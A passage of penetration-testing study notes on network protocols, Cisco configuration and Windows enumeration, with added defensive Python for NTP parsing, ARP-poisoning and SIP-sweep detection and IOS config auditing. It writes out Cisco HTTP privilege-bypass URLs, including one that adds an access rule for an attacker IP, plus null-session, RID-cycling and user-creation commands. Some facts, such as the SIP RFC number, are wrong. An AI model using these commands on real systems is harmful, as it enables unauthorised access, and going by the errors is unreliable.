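import struct
from typing import Dict, Tuple

NTP_EPOCH_OFFSET = 2_208_988_800          # seconds from 1900-01-01 to 1970-01-01
HEADER = "!BBbbII4sQQQQ"                  # 48 bytes, network byte order


def unix_to_ntp(t: float) -> int:
    """Pack a Unix time into the 32.32 fixed-point NTP timestamp."""
    whole = int(t)
    frac = min(int(round((t - whole) * 2**32)), 0xFFFFFFFF)
    return ((whole + NTP_EPOCH_OFFSET) << 32) | frac


def ntp_to_unix(ts: int) -> float:
    return (ts >> 32) - NTP_EPOCH_OFFSET + (ts & 0xFFFFFFFF) / 2**32


def build_server_reply(stratum: int, t_ref: float, t1: float, t2: float, t3: float) -> bytes:
    """Construct a mode-4 (server) reply echoing the client's originate time t1."""
    li_vn_mode = (0 << 6) | (4 << 3) | 4   # leap 0, version 4, mode 4 = server
    return struct.pack(HEADER, li_vn_mode, stratum, 6, -20, 0, 0, b"GPS\x00",
                       unix_to_ntp(t_ref), unix_to_ntp(t1), unix_to_ntp(t2), unix_to_ntp(t3))


def parse_reply(packet: bytes) -> Dict:
    (lvm, stratum, _poll, _precision, _rdelay, _rdisp, refid,
     ref, orig, recv, xmit) = struct.unpack(HEADER, packet)
    return {"leap": lvm >> 6, "version": (lvm >> 3) & 7, "mode": lvm & 7,
            "stratum": stratum, "synchronised": 1 <= stratum <= 15,
            "refid": refid.rstrip(b"\x00").decode("ascii", "replace"),
            "t_ref": ntp_to_unix(ref), "t1": ntp_to_unix(orig),
            "t2": ntp_to_unix(recv), "t3": ntp_to_unix(xmit)}


def offset_and_delay(t1: float, t2: float, t3: float, t4: float) -> Tuple[float, float]:
    """t1 originate (client clock), t2 receive and t3 transmit (server clock),
    t4 arrival (client clock). The round-trip delay excludes the server's
    processing time (t3 - t2); the offset assumes the two one-way delays are
    equal, which is exactly the "half of total minus processing" estimate."""
    delay = (t4 - t1) - (t3 - t2)
    offset = ((t2 - t1) + (t3 - t4)) / 2
    return offset, delay


def accept_reply(reply: Dict, t4: float, max_delay: float = 0.5) -> bool:
    """Minimal sanity filter: a server-mode packet from a synchronised source whose
    round trip is plausible. Thresholds are assumed; real clients apply more tests."""
    _, delay = offset_and_delay(reply["t1"], reply["t2"], reply["t3"], t4)
    return reply["mode"] == 4 and reply["synchronised"] and 0 <= delay <= max_delay


if __name__ == "__main__":
    # Assumed: 10 ms each way, 5 ms server processing, server clock 0.5 s ahead.
    t1, t2, t3, t4 = 1_700_000_000.000, 1_700_000_000.510, 1_700_000_000.515, 1_700_000_000.025
    reply = parse_reply(build_server_reply(2, t1 - 30, t1, t2, t3))
    print(offset_and_delay(reply["t1"], reply["t2"], reply["t3"], t4))   # about (0.5, 0.02)
```

Because nothing in the packet authenticates it, a spoofed reply only has to pass these plausibility checks to move the client's clock; that is why the notes call for cryptographically signed packets where clock accuracy matters.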
- Reference Timestamp: the time the system clock was last set or corrected, in 64-bit timestamp format.
- Originate Timestamp: the time at which the request departed the client for the server, in 64-bit timestamp format.
- Receive Timestamp: the time at which the client request arrived at the server, in 64-bit timestamp format.
- Transmit Timestamp: the time at which the server reply departed the server, in 64-bit timestamp format.

NTP servers can be susceptible to man-in-the-middle attacks unless packets are cryptographically signed for authentication. NTP message spoofing can be used to move clocks on client computers and allow a number of attacks based on bypassing cryptographic key expiration.
- Replay-delay attacks, MITM

D2 - Network Traffic Analysis
Techniques for local network traffic analysis. Analysis of network traffic stored in PCAP files.

D3 - Networking Protocols
Security issues relating to the networking protocols:

ARP - ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network.

DHCP - There are two different classes of potential security problems related to DHCP: unauthorised DHCP servers and unauthorised DHCP clients.

CDP - The Cisco Discovery Protocol is a proprietary layer 2 protocol that all Cisco devices can use by default. CDP discovers other Cisco devices that are directly connected.
10:41:55.398940 snap 0:0:c:20:0 CDP v2, ttl: 180s, checksum: 692 (unverified) Device-ID (0x01), length: 25 bytes: 'MYSWITCH01.net.somecompany.com'
Cisco Discovery Protocol runs on all media that support the Subnetwork Access Protocol (SNAP): LAN, Frame Relay and ATM media. Cisco Discovery Protocol runs over the data link layer only; therefore, two systems that support different network-layer protocols can learn about each other. The Subnetwork Access Protocol (SNAP) is a mechanism for multiplexing on networks using IEEE 802.2 LLC.
The SNAP header consists of a 3-octet IEEE organizationally unique identifier (OUI) followed by a 2-octet protocol ID. CDP may be used between Cisco routers, switches and other network equipment to advertise their software version, capabilities and IP address. CDP spoofing is the creation of forged CDP packets that impersonate other devices, either real or arbitrary. CDP cache pollution: the CDP table becomes unusable because it contains a lot of false information.
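Added example (not from these notes) for the ARP item under D3, written from the monitoring side: given a stream of observed ARP replies, it reports addresses announced with more than one hardware address, replies that contradict a static inventory (the gateway's known MAC), and a single MAC that claims several addresses, which are the three signatures cache poisoning leaves. The reply list and the inventory are constructed for the example; in practice they come from a capture and from the asset register.

```python
"""Spotting ARP cache poisoning in a stream of observed ARP replies.

Added example (not from the notes). ARP_REPLIES is a CONSTRUCTED capture summary
(timestamp, sender IP, sender MAC) and KNOWN_HOSTS is an assumed static inventory
for the segment; in practice both come from a PCAP and an asset register.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

Reply = Tuple[float, str, str]

KNOWN_HOSTS: Dict[str, str] = {"192.168.1.1": "00:11:22:33:44:01"}   # the gateway

ARP_REPLIES: List[Reply] = [
    (1.0, "192.168.1.1",  "00:11:22:33:44:01"),
    (2.0, "192.168.1.20", "00:11:22:33:44:20"),
    (3.0, "192.168.1.1",  "de:ad:be:ef:00:01"),   # gateway IP now claimed by another MAC
    (3.5, "192.168.1.1",  "de:ad:be:ef:00:01"),
    (4.0, "192.168.1.30", "de:ad:be:ef:00:01"),   # the same MAC claims a second IP
]


def ip_to_macs(replies: Iterable[Reply]) -> Dict[str, Set[str]]:
    """Every hardware address seen for each sender IP."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for _, ip, mac in replies:
        seen[ip].add(mac.lower())
    return dict(seen)


def conflicting_ips(replies: Iterable[Reply]) -> Dict[str, Set[str]]:
    """IPs announced with more than one hardware address (a poisoning signature)."""
    return {ip: macs for ip, macs in ip_to_macs(replies).items() if len(macs) > 1}


def inventory_violations(replies: Iterable[Reply], known: Dict[str, str]) -> List[Tuple[str, str]]:
    """Replies whose (ip, mac) contradict the static inventory, de-duplicated and sorted."""
    bad = {(ip, mac.lower()) for _, ip, mac in replies
           if ip in known and mac.lower() != known[ip].lower()}
    return sorted(bad)


def macs_claiming_many_ips(replies: Iterable[Reply], threshold: int = 2) -> Dict[str, Set[str]]:
    """Hardware addresses that claim at least `threshold` distinct IPs."""
    claims: Dict[str, Set[str]] = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac.lower()].add(ip)
    return {mac: ips for mac, ips in claims.items() if len(ips) >= threshold}


if __name__ == "__main__":
    print(conflicting_ips(ARP_REPLIES))
    print(inventory_violations(ARP_REPLIES, KNOWN_HOSTS))
    print(macs_claiming_many_ips(ARP_REPLIES))
```

The inventory check is the most reliable of the three for the gateway, since that is the address an attacker most wants to impersonate; on switches the same protection is provided in-line by dynamic ARP inspection or static ARP entries for the default gateway.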
HSRP - HSRP provides redundancy for IP networks, ensuring that traffic can transparently recover from first-hop failures. Devices which share a common layer 2 domain participate in a virtual router environment, ensuring that a single device assumes the egress routing role. By continually exchanging HSRP messages, eligible devices can automatically take over routing responsibilities if issues arise with the active device.

VRRP - The Virtual Router Redundancy Protocol (VRRP) is a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts. This increases the availability and reliability of routing paths via automatic default gateway selection on an IP subnetwork.

VTP - VLAN hopping; Yersinia. The VLAN Trunking Protocol (VTP) is a proprietary Cisco protocol designed to make life easy by automatically propagating VLAN information throughout the network. Layer 2 attacks. Attacks: sending a VTP packet, deleting all VTP VLANs, deleting one VLAN, adding one VLAN.

STP - STP attack: involves an attacker spoofing the root bridge in the topology. Spanning tree functions must be disabled on all user interfaces but maintained for network-to-network interfaces to avoid a network loop. Use Ettercap to establish a bridge and Yersinia to send crafted BPDUs (Bridge Protocol Data Units).

TACACS+ - The security principle is known as Authentication, Authorization and Accounting (AAA). The two main AAA protocols commonly used in enterprise networks today are TACACS+ and RADIUS. Terminal Access Controller Access-Control System (TACACS) is a protocol set created and intended for controlling access to UNIX terminals. Cisco created a new protocol called TACACS+. TACACS+ uses Transmission Control Protocol (TCP) port 49 to communicate between the TACACS+ client and the TACACS+ server. An example is a Cisco switch authenticating and authorizing administrative access to the switch's IOS CLI.
The switch is the TACACS+ client, and Cisco Secure ACS is the server.

Vulnerabilities of TACACS+
1. Lack of integrity checking - almost no integrity checking exists in TACACS+.
2. Vulnerability to replay attacks - duplicate accounting records can be produced, possibly with forged task_id fields to avoid detection.
3. Forced session_id collisions - the encryption of reply packets can be compromised.
4. The birthday paradox and session_ids - given enough sessions, the encryption of many may be compromised. Another problem with session_ids is that they are too small to be unique if randomly chosen.
5. Lack of padding - the lengths of user passwords can be determined.
6. MD5 context leak

D4 - IPSec
Enumeration and fingerprinting of devices running IPSec services.
Open UDP port 500 and permit IP protocol numbers 50 (ESP) and 51 (AH) on both inbound and outbound firewall filters. ESP and AH are layer 4 protocols, on the same level as TCP (IP protocol 6) and UDP (IP protocol 17). You can use nmap to identify the ISAKMP service on UDP port 500. After identifying accessible ISAKMP services, you can probe and investigate these services to fingerprint and identify them.

Remote users who require remote access to internal network resources often use a pre-shared key (PSK) to authenticate. A serious flaw exists in IPsec which can be exploited if a VPN gateway supports aggressive mode IKE and a PSK is used to provide authentication. A remote attacker can attempt to authenticate using aggressive mode IKE and obtain a hashed authentication response from the gateway. When using main mode IKE, this authentication response is protected using a Diffie-Hellman shared secret, but aggressive mode doesn't provide any protection. If a PSK is in use (as opposed to digital signatures or public key encryption), the aggressive mode IKE authentication response is the PSK hashed using MD5 or SHA1. This hash can be attacked offline, and the PSK compromised.
VPNs can be classified into two primary types: site-to-site VPNs and remote access VPNs. We will look at layer-3 IPsec VPNs that require a thick VPN client, as opposed to SSL-based VPNs that require only a browser on the client machine to establish connectivity to internal resources like file and mail servers.

IPsec is based on symmetric-key encryption and consists of the following primary security components:
- Authentication Header (AH): essentially a message authenticity checksum that is appended to every packet to ensure its authenticity and protect its integrity as it traverses the Internet.
- Encapsulating Security Payload (ESP): the encryption mechanism used to protect the confidentiality of communication between the subjects.
- Internet Key Exchange (IKE): this protocol provides a means to securely exchange the secret key, which is essential for the effective operation of AH and ESP between the communicating subjects. While the secret keys can be manually exchanged, such a solution is not scalable, and the keys should be changed periodically to minimise the probability of their compromise.

IKE has two modes: IKE Main Mode and IKE Aggressive Mode. Main Mode key exchange uses the Diffie-Hellman exchange to generate a mutual shared key between the client and the server. On the other hand, Aggressive Mode does not use a Diffie-Hellman exchange to protect the authentication data. Therefore, it is possible to capture this authentication data using a sniffer and crack it offline.

The main objective of this phase is to discover any vulnerabilities in the VPN implementation that an attacker may be able to exploit. This is usually considered a zero-knowledge test where only the IP address of the VPN server is known. This phase will be shown using three steps:
1. Reconnaissance: determining open ports and doing VPN fingerprinting
2. Assessment of PSK protocol mode
3. Exploitation of any default user accounts

The first step in the reconnaissance process entails port scanning the VPN server to make an educated guess on the type of VPN implementation. The following table provides a mapping of open ports to VPN type, using default ports:
PPTP - PPTP uses TCP 1723 and IP protocol 47 (GRE) to encrypt data between peers.

D5 - VoIP
Enumeration and fingerprinting of devices running VoIP services.
Ports 5060 & 5061 - SIP (VoIP) on TCP and UDP are associated with the Session Initiation Protocol (SIP). Port 5060 is commonly used for non-encrypted signalling traffic, whereas port 5061 is typically used for traffic encrypted with Transport Layer Security (TLS).

Knowledge of the SIP protocol (Session Initiation Protocol)
Like HTTP it is a client-server model, not client to client: one handset talks to another through the server. There are two different types of SIP messages: requests and responses.
- The first line of a request has a method, defining the nature of the request, and a Request-URI, indicating where the request should be sent. Example: REGISTER
- The first line of a response has a response code. Example: 200 is success.
  - 1xx - Provisional messages
  - 2xx - Success answers
  - 3xx - Redirection answers
  - 4xx - Method failures: 401 - Unauthorised, 403 - Forbidden
  - 5xx - Server failures
  - 6xx - Global failures

You can sniff the traffic and run it through the SIPcrack suite. Authentication data includes user ID, SIP extension, password hash (MD5) and the victim's IP address.

There are six basic methods (defined in RFC 254) for client requests:
HELLO - fake command, does not exist in SIP.
INVITE: Invites a user or a service to a new session or to modify parameters of an established session. Username enumeration: the INVITE message initiates a SIP dialog with the intent to establish a call. It is sent by a user agent client to a user agent server (followed by OK; see the diagram above showing the flow). Caller ID spoofing (stealth), but the INVITE method generates the ring at the client side. There are numerous ways to craft malformed SIP INVITE messages (scapy, SIPp).
ACK: Sent after a response; the application detects what accounts are defined on the SIP server. Confirms the session establishment.
OPTIONS: Request information about the capabilities of a server.
BYE: End of a session.
CANCEL: Cancel a pending request.
REGISTER (to IP-PBX server): Registers the user agent when a new client is connected/reconnected to the network, by sending a REGISTER request to the IP-PBX server to register the associated user ID/extension number. Also implements a location service for user agents, which indicate their address information to the server.
sip-enum-users - this Nmap script works by sending REGISTER SIP requests to the server with the specified extension and checking the response status code in order to know if an extension is valid. If the response status code is 401 or 407, the extension is valid and requires authentication. If the response status code is 200, the extension exists and doesn't require any authentication, while a 403 response status code means that the extension exists but access is forbidden. Is this more stealthy, as it will not generate a ring on the client?

There are additional methods that can be used, for example INFO, SUBSCRIBE, etc. (published in other RFCs):
- SUBSCRIBE - Initiates a subscription for notification of events from a notifier.
- PRACK - Provisional acknowledgement.
- NOTIFY - Inform a subscriber of notifications of a new event.
- PUBLISH - Publish an event to a notification server.
- INFO - Send mid-session information that does not modify the session state.
- REFER - Ask the recipient to issue a SIP request for the purpose of call transfer.
- MESSAGE - Transport text messages.
- UPDATE - Modifies the state of a session without changing the state of the dialog.

The Session Initiation Protocol (SIP) is a communications protocol for signalling and controlling multimedia communication sessions in applications of Internet telephony for voice and video calls, in private IP telephone systems, as well as in instant messaging over Internet Protocol (IP) networks. SIP is only involved in the signalling operations of a media communication session and is primarily used to set up and terminate voice or video calls.
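Added example (not from these notes) for the SIP message structure and the REGISTER behaviour above, from the PBX operator's side: a parser for the request start-line, the response-class mapping from the 1xx-6xx table, and a detector that flags a source sending REGISTER for many distinct extensions in a short window, which is the pattern the REGISTER-based extension check leaves in a PBX or session border controller log. The log events and the thresholds are constructed for the example.

```python
"""SIP start-line parsing, response classes and a REGISTER-sweep detector for SIP logs.

Added example (not from the notes). SIP_LOG is a CONSTRUCTED event list
(time, source IP, method, target user, response code) of the kind a PBX or
SBC log yields; the window and threshold are assumed values.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

RESPONSE_CLASSES = {1: "provisional", 2: "success", 3: "redirection",
                    4: "method failure", 5: "server failure", 6: "global failure"}

# Method, Request-URI, protocol version, as in "REGISTER sip:1001@pbx.example.com SIP/2.0".
REQUEST_LINE = re.compile(r"^([A-Z]+) (sips?:\S+) (SIP/2\.0)$")

Event = Tuple[float, str, str, str, int]

SIP_LOG: List[Event] = [
    (0.0,    "192.168.5.20", "REGISTER", "2001", 401),
    (0.2,    "192.168.5.20", "REGISTER", "2001", 200),   # normal: challenge, then success
    (10.0,   "10.0.0.9",     "REGISTER", "1001", 401),
    (10.5,   "10.0.0.9",     "REGISTER", "1002", 404),
    (11.0,   "10.0.0.9",     "REGISTER", "1003", 404),
    (11.5,   "10.0.0.9",     "REGISTER", "1004", 401),
    (12.0,   "10.0.0.9",     "REGISTER", "1005", 403),
    (12.5,   "10.0.0.9",     "REGISTER", "1006", 404),
    (3600.0, "192.168.5.20", "REGISTER", "2001", 200),   # periodic re-registration
]


def parse_request_line(line: str) -> Tuple[str, str, str]:
    """Split a SIP request start-line into (method, request-uri, version)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a SIP request line: {line!r}")
    return m.group(1), m.group(2), m.group(3)


def response_class(code: int) -> str:
    """Map a status code to its class per the 1xx-6xx table."""
    return RESPONSE_CLASSES.get(code // 100, "unknown")


def register_sweeps(log: List[Event], window: float = 60.0, min_targets: int = 5) -> Dict[str, int]:
    """Sources that send REGISTER for at least min_targets distinct users inside
    any window of `window` seconds; the value is the largest distinct count seen.
    One handset re-registering the same extension repeatedly never trips this."""
    per_source: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for t, src, method, user, _ in log:
        if method == "REGISTER":
            per_source[src].append((t, user))
    flagged: Dict[str, int] = {}
    for src, events in per_source.items():
        events.sort()
        best = 0
        for i, (t0, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - t0 <= window}
            best = max(best, len(users))
        if best >= min_targets:
            flagged[src] = best
    return flagged


def response_mix(log: List[Event], src: str) -> Dict[str, int]:
    """Count of response classes returned to one source: a sweep shows almost
    only 4xx answers, a working phone mostly 2xx."""
    mix: Dict[str, int] = defaultdict(int)
    for _, s, _, _, code in log:
        if s == src:
            mix[response_class(code)] += 1
    return dict(mix)


if __name__ == "__main__":
    print(parse_request_line("REGISTER sip:1001@pbx.example.com SIP/2.0"))
    print(register_sweeps(SIP_LOG))
    print(response_mix(SIP_LOG, "10.0.0.9"))
```

Rate-limiting REGISTER per source and returning the same response for unknown and forbidden extensions are the usual mitigations; the detector above is what you run over the logs to see whether either is needed.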
Voice and video media streams are typically carried between the terminals using the Real-time Transport Protocol (RTP) or Secure Real-time Transport Protocol (SRTP). Under SIP, each resource, such as a user agent or a voicemail box, is identified by a Uniform Resource Identifier (URI).

D6 - Wireless
Enumeration and fingerprinting of devices running wireless (802.11) services.
- airodump-ng wlan0mon - will show surrounding wireless networks along with their statuses.
- airodump-ng wlan0mon -w jdw-1 - will output data into jdw-1.csv, which can then be opened in a visualiser for easier analysis.
- Wireshark on the WLAN interface to view better packet data.
Knowledge of various options for encryption and authentication, and the relative methods of each.
WEP - Wired Equivalent Privacy (WEP) is the original 802.11 pre-shared key mechanism, utilising RC4 encryption. WEP is vulnerable to being hacked; the encryption key can be derived by an eavesdropper who sees enough traffic. WEP uses a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. Weaknesses are:
- Passive attacks to decrypt traffic based on statistical analysis.
- Active attacks to inject new traffic from unauthorised mobile stations, based on known plaintext.
- Active attacks to decrypt traffic, based on tricking the access point.
- Dictionary-building attack that, after analysis of about a day's worth of traffic, allows real-time automated decryption of all traffic.
WEP's major weakness is its use of static encryption keys, which can be derived from enough traffic analysis.

WPA - WPA (Wi-Fi Protected Access). WPA was originally meant as a wrapper for WEP to tackle the insecurities caused by WEP. It was meant as a quick fix until WPA2 became available. The only attack known, besides flaws in the firmware of some routers, is brute forcing the WPA key. There are two modes in which it can operate:
1. WPA-PSK: pre-shared key (password), also known as shared authentication, or WPA Personal.
2. WPA-Enterprise (802.1X authentication, for wired and Wi-Fi networks: Supplicant, Authenticator, Authentication Server). This requires a RADIUS server and can be combined with an Extensible Authentication Protocol (also known as EAP authentication, which establishes a secure tunnel between the participants involved in an authentication exchange).
WPA Personal implements the Temporal Key Integrity Protocol (TKIP) with RC4 encryption. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.
WPA also includes a Message Integrity Check, which is designed to prevent an attacker from altering and resending data packets. This replaces the cyclic redundancy check (CRC) that was used by the WEP standard. WPA uses a message integrity check algorithm called TKIP to verify the integrity of the packets. TKIP is much stronger than a CRC, but not as strong as the algorithm used in WPA2.

WPA2 - WPA2 uses an encryption device that encrypts the network with a 256-bit key. The most important improvement of WPA2 over WPA was the use of the Advanced Encryption Standard (AES) for encryption. WPA2 does not use TKIP but CCMP for cryptographic encapsulation. At this time the main vulnerability of a WPA2 system is when the attacker already has access to a secured Wi-Fi network and can gain access to certain keys to perform an attack on other devices on the network.

Enterprise Authentication
802.1X PNAC (Port-based Network Access Control) can use EAP, as can Wi-Fi. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication. WPA2 and WPA use five different EAP types as authentication mechanisms. There are currently about 40 different methods defined. The EAP choice depends on the level of security you need and your server/client specs. Although there are more than ten EAP types, the popular ones are:
- LEAP: A proprietary method by Cisco (Lightweight Extensible Authentication Protocol) that was used early on. It is based on Microsoft CHAP, which means that the information being sent between these devices has a few security shortcomings.
- PEAP: (Protected Extensible Authentication Protocol) was created by Cisco, Microsoft and RSA Security to come up with a way to encrypt all communication.
- EAP-TLS: Unlike most TLS implementations of HTTPS, such as on the World Wide Web, the majority of implementations of EAP-TLS require client-side X.509 certificates. The requirement for a client-side certificate gives EAP-TLS its authentication strength and illustrates the classic convenience vs. security trade-off.
- EAP-MD5: Offers minimal security; (MD5 hash) does not support key generation, which makes it unsuitable for use with dynamic WEP or WPA/WPA2 Enterprise. EAP-MD5 differs from other EAP methods in that it only provides authentication of the EAP peer to the EAP server, but not mutual authentication. By not providing EAP server authentication, this EAP method is vulnerable to man-in-the-middle attacks. EAP-MD5 support was first included in Windows 2000 and deprecated in Windows Vista.
- EAP Protected One-Time Password (EAP-POTP) - uses one-time password (OTP) tokens, such as a handheld hardware device or a hardware or software module running on a personal computer, to generate authentication keys. EAP-POTP can be used to provide unilateral or mutual authentication and key material in protocols that use EAP. The EAP-POTP method provides two-factor user authentication, meaning that a user needs both physical access to a token and knowledge of a personal identification number (PIN) to perform authentication.
- EAP Pre-Shared Key (EAP-PSK) - Mutual authentication and session key derivation using a pre-shared key (PSK). It provides a protected communication channel, when mutual authentication is successful, for both parties to communicate, and is designed for authentication over insecure networks such as IEEE 802.11.
- EAP Password (EAP-PWD) - Uses a shared password for authentication.
The password may be a low-entropy one and may be drawn from some set of possible passwords, like a dictionary, which is available to an attacker. The underlying key exchange is resistant to active attack, passive attack and dictionary attack.
- EAP Tunnelled Transport Layer Security (EAP-TTLS) - an EAP protocol that extends TLS. Windows started EAP-TTLS support with Windows 8. The client can, but does not have to, be authenticated to the server via a CA-signed PKI certificate. This greatly simplifies the setup procedure, since a certificate is not needed on every client (as compared with EAP-TLS). After the server is securely authenticated to the client via its CA certificate, and optionally the client to the server, the server can then use the established secure connection ("tunnel") to authenticate the client. It can use an existing and widely deployed authentication protocol and infrastructure, incorporating legacy password mechanisms and authentication databases, while the secure tunnel provides protection from eavesdropping and man-in-the-middle attack. Note that the user's name is never transmitted in unencrypted clear text, improving privacy.

D7 - Configuration Analysis
Analysing configuration files from the following types of Cisco equipment:

Cisco HTTP Arbitrary Access vulnerability
Cisco devices have a number of privilege levels; these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode. By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privileged EXEC mode.
Web browse to the Cisco device:
http://<IP>
Click cancel on the logon box and enter the following address:
http://<IP>/level/99/exec/show/config
You may have to scroll through all of the levels from 16-99 for this to work.
To raise the logging level to only log emergencies:
http://<IP>/level/99/configure/logging/trap/emergencies/CR
To add a rule to allow Telnet:
http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR

Interpreting the configuration of other manufacturers' devices.
https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/07_basic_commands_tasks.htm
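Added example (not the notes' own tooling) serving both the D1 management-protocol section (clear-text SNMPv1/v2c communities, Telnet) and this D7 configuration-analysis section: a static reviewer for an IOS-style running-config that reports SNMPv1/v2c community strings (default or read-write ones as high severity), an enabled HTTP server, Telnet accepted on VTY lines, and 'enable password' used in place of 'enable secret'. Both configurations are constructed for the example, and the hardened one shows the corrected settings beside the weak ones; the secret hash in it is a placeholder.

```python
"""Static review of an IOS-style configuration for management-plane weaknesses.

Added example (not the notes' own tooling). SAMPLE_CONFIG and HARDENED_CONFIG are
CONSTRUCTED; the checks cover SNMPv1/v2c community strings (default or read-write),
the HTTP server, Telnet on VTY lines and 'enable password' instead of 'enable secret'.
"""
import re
from typing import List, Tuple

SAMPLE_CONFIG = """\
hostname EDGE-RTR
no service password-encryption
enable password 7 094F471A1A0A
snmp-server community public RO
snmp-server community private RW
snmp-server group NETMON v3 priv
ip http server
line vty 0 4
 transport input telnet
line vty 5 15
 transport input ssh
"""

HARDENED_CONFIG = """\
hostname EDGE-RTR
service password-encryption
enable secret 5 $1$PLACEHOLDER$PLACEHOLDERPLACEHOLDER
no snmp-server community public
snmp-server group NETMON v3 priv
no ip http server
ip http secure-server
line vty 0 15
 transport input ssh
"""

# snmp-server community <string> [view <name>] [RO|RW] [acl]; RO is the default.
COMMUNITY_RE = re.compile(r"^snmp-server community (\S+)(?:\s+view\s+\S+)?(?:\s+(RO|RW))?")
DEFAULT_COMMUNITIES = {"public", "private", "cisco"}

Finding = Tuple[str, str]   # (severity, message)


def audit_config(config: str) -> List[Finding]:
    findings: List[Finding] = []
    section = None                      # the 'line ...' block we are inside, if any
    for raw in config.splitlines():
        stripped = raw.strip()
        if not raw.startswith(" "):     # an unindented command ends any line block
            section = stripped if stripped.startswith("line ") else None
        m = COMMUNITY_RE.match(stripped)
        if m:
            community, mode = m.group(1), m.group(2) or "RO"
            sev = "high" if mode == "RW" or community.lower() in DEFAULT_COMMUNITIES else "medium"
            findings.append((sev, f"SNMPv1/v2c community '{community}' ({mode}) travels in clear "
                                  f"text; replace it with an SNMPv3 authPriv user"))
        elif stripped == "ip http server":
            findings.append(("high", "HTTP management server enabled; disable it, or use "
                                     "'ip http secure-server' restricted by an access class"))
        elif stripped.startswith("enable password"):
            findings.append(("high", "'enable password' (clear or reversible type 7) in use; "
                                     "use 'enable secret'"))
        elif stripped == "no service password-encryption":
            findings.append(("low", "line passwords stored unobscured; set "
                                    "'service password-encryption'"))
        elif section and stripped.startswith("transport input"):
            allowed = stripped.split()[2:]
            if "telnet" in allowed or "all" in allowed:
                findings.append(("high", f"{section}: Telnet accepted (transport input "
                                         f"{' '.join(allowed)}); restrict to ssh"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_config(SAMPLE_CONFIG):
        print(f"[{severity}] {message}")
    print("hardened:", audit_config(HARDENED_CONFIG))
```

Run it over configurations pulled from the devices (or from the backup repository) rather than over a single file at a time; the line-block tracking matters because "transport input" is only meaningful inside a "line" section.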
Appendix E: Microsoft Windows Security Assessment

NetBIOS
LOC-SRV       135/TCP  Used for RPC client-server communication (DCE endpoint)
LOC-SRV       135/UDP  Used for RPC client-server communication (DCE endpoint)
NETBIOS-NS    137/UDP  Name Service - NetBIOS Name Table (NBT); local NetBIOS browser, naming and lookup services
NETBIOS-DGM   138/UDP  Datagram Service - used for local NetBIOS browser, naming and lookup services
NETBIOS-SSN   139/TCP  Session Service - used for authentication and file sharing
MICROSOFT-DS  445/TCP  CIFS server
MICROSOFT-DS  445/UDP

Windows RPC
Epdump is a Microsoft command line tool to query RPC endpoints. Rpcdump is another useful tool.
epdump 192.168.0.1
The response will show NetBIOS names and IP addresses. It will also show, for example, that the Messenger Service is accessible through UDP port 1028, along with named pipes (\PIPE\ntsvcs). Named pipes are accessible through SMB upon authenticating.

E1 - Domain Reconnaissance
Identifying domains/workgroups and domain membership within the target network.
echo %userdomain% (or as listed by SET) will show domain membership.

NetBIOS Name Server - accessible through UDP 137. It provides the NetBIOS Name Table (NBT).
nbtstat -n
nbtstat -A remote-ip
net user <userName> /domain - lists both the local and global groups that the user belongs to.
Adding a user: net user username password /add
net config workstation - lists domain info

Master Browser
NBTSTAT -A x.x.x.x / -n
__MSBROWSE__.<01> GROUP Registered # Master browser
SUPERMAN <00> UNIQUE Registered # Hostname
ASIA <00> GROUP Registered # Domain/Workgroup
...or UNIQUE 1B (Domain Master Browser), 1D (Master Browser)
Also, can use: browstat getmaster \device\netbt_el59x1 domainname

NetBIOS Datagram Service - accessible through UDP 138.
NetBIOS Session Service - accessible through TCP 139 - facilitates authentication. Can use a null session:
net use \\target\IPC$ "" /user:""
Tools: Enum - by default attempts a null session but can specify a username and password. Winfo is a similar tool.
Both of these "forward lookup" tools can be restricted if the admin sets RestrictAnonymous = 1.

RID Cycling
GetAcct performs reverse lookups of Windows Server RID values to get user account names, known as RID cycling. NT4 can only set RestrictAnonymous = 1, so it is susceptible to RID cycling. Windows 2000 Server has extended anonymous protection and can set RestrictAnonymous = 2, so is not susceptible?
By default, Windows 2000 and 2003 servers allow anonymous (null session) access to SMB. If a null session is not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces. rpcclient, part of the Unix Samba package, can be used to interact with RPC endpoints across SMB and named pipes. A useful command within rpcclient is lookupsids, which allows SID to username lookups (RID cycling). Below it is used against a remote system to perform RID cycling: it first looks up the full SID value of the chris account on WEBSERV, and then increments the RID value (1001 to 1007) to enumerate other user accounts through the LSARPC interface:
rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient> lookupnames chris
chris S-1-xxxxx-1003 (User: 1)
rpcclient> lookupsids S-1-xxxxx-1001

Every Windows user, computer, or service account has a unique alphanumeric identifier called the security ID (SID). Example SID:
S-1-5-21-4064627337-2434140041-2375368561-1036
1036 is the RID. The RID uniquely identifies a security principal relative to the local or domain security authority that issued the SID. Any group or user that the Windows OS doesn't create has a RID of 1000 or greater by default. S identifies the following string as a SID. The three values after 21 (4064627337-2434140041-2375368561 here) are the domain or local computer identifier. If you create a user object, delete it, then recreate it with the same name, the new object won't have the same SID as the original object.

Through a process of RID cycling it is possible to enumerate all domain users from a Windows 2003 domain controller. This method will work on Windows 2003 domain controllers, as the SID of the "Domain Users" group can then be enumerated; this was done to ensure a good level of compatibility, and the same technique will not work on Windows 2008 domain controllers. With this information it is then possible to iterate through the RIDs to enumerate users.
